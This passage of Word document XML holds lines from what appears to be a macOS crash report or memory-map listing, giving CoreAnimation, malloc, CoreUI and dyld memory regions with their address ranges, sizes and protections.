        <w:t xml:space="preserve">CoreAnimation          0000000112fef000-000000011302d000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113038000-00000001130f2000 [  744K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113116000-0000000113122000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000113125000-0000000113127000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113127000-00000001131e1000 [  744K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113202000-0000000113240000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011324b000-0000000113253000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011325f000-00000001132a5000 [  280K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001132b1000-0000000113376000 [  788K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011338c000-0000000113484000 [  992K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001134b0000-00000001134f4000 [  272K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000113521000-000000011355f000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011356a000-0000000113586000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113588000-00000001135ca000 [  264K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001135db000-00000001135eb000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001135f3000-0000000113645000 [  328K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113650000-000000011368e000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE           0000000113699000-00000001136b9000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001136b9000-0000000113735000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011374b000-0000000113789000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           0000000113796000-00000001137bc000 [  152K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001137bc000-00000001137fa000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113805000-000000011385f000 [  360K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011386a000-00000001138a8000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001138ba000-000000011393a000 [  512K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113950000-00000001139cc000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          00000001139ec000-0000000113a36000 [  296K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113a41000-0000000113abd000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113ad3000-0000000113b8a000 [  732K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113b95000-0000000113bd3000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113be3000-0000000113c5f000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113c75000-0000000113cb3000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113cbe000-0000000113d08000 [  296K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113d14000-0000000113d9b000 [  540K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113da6000-0000000113de4000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113def000-0000000113e2d000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113e66000-0000000113ec7000 [  388K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113f3b000-0000000113fb7000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000113fee000-0000000114044000 [  344K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011404f000-00000001140cb000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001140e4000-00000001140ec000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          00000001140ef000-0000000114145000 [  344K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114150000-00000001141cc000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001141e2000-00000001141fa000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           00000001141fc000-00000001142ef000 [  972K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001142ef000-000000011436b000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114381000-0000000114439000 [  736K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           0000000114439000-00000001144b3000 [  488K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114558000-000000011461a000 [  776K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011463b000-00000001146f5000 [  744K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114717000-000000011481b000 [ 1040K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114847000-00000001148c3000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001148da000-0000000114918000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114923000-0000000114961000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114962000-00000001149e2000 [  512K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001149ef000-00000001149f3000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   00000001149f4000-0000000114af1000 [ 1012K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114b9f000-0000000114bdd000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114c15000-0000000114c7f000 [  424K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114c8a000-0000000114d44000 [  744K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114d66000-0000000114ded000 [  540K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114df8000-0000000114e7f000 [  540K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114eae000-0000000114eca000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114ecc000-0000000114f16000 [  296K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114f24000-0000000114f6d000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114f78000-0000000114fc6000 [  312K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000114fd4000-000000011502e000 [  360K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115039000-0000000115077000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115084000-00000001152fc000 [ 2528K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115324000-00000001153a0000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001153b6000-00000001153f4000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          00000001153ff000-00000001154b9000 [  744K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001154bd000-00000001154c9000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  00000001154cb000-00000001154cc000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001154cc000-0000000115548000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011555e000-0000000115694000 [ 1240K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001156ae000-0000000115746000 [  608K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115754000-0000000115842000 [  952K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115924000-0000000115962000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011597a000-0000000115a55000 [  876K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000115a7d000-0000000115b6e000 [  964K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115bd5000-0000000115c3a000 [  404K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115caa000-0000000115e4d000 [ 1676K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000115e7a000-000000011606a000 [ 1984K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000116090000-000000011616b000 [  876K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001161df000-000000011625b000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG image               000000011626c000-000000011626e000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011626e000-00000001162ea000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011631a000-000000011648e000 [ 1488K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001164dd000-0000000116520000 [  268K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011652c000-0000000116550000 [  144K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000116550000-0000000116b20000 [ 5952K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000116b36000-0000000116bfb000 [  788K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000116cec000-0000000116ea2000 [ 1752K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE           00000001172c5000-00000001172f8000 [  204K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011730e000-0000000117337000 [  164K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000117484000-0000000117516000 [  584K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000117626000-0000000117629000 [   12K] rw-/rwx SM=COW  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000117629000-000000011765d000 [  208K] rw-/rwx SM=PRV  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001178bb000-0000000117a89000 [ 1848K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   0000000117a89000-0000000117c95000 [ 2096K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Accelerate framework   0000000117e8d000-0000000117ead000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000117ee1000-0000000117f07000 [  152K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011813e000-000000011813f000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011813f000-0000000118378000 [ 2276K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011842d000-0000000118453000 [  152K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011850a000-0000000118533000 [  164K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001186c5000-00000001186e6000 [  132K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001187e7000-00000001187e9000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000118854000-000000011889d000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Accelerate framework   00000001188fb000-000000011891b000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001189eb000-0000000118a34000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000118a58000-0000000118a76000 [  120K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000118c52000-0000000118c54000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000118c62000-0000000118c64000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000118c72000-0000000118c74000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
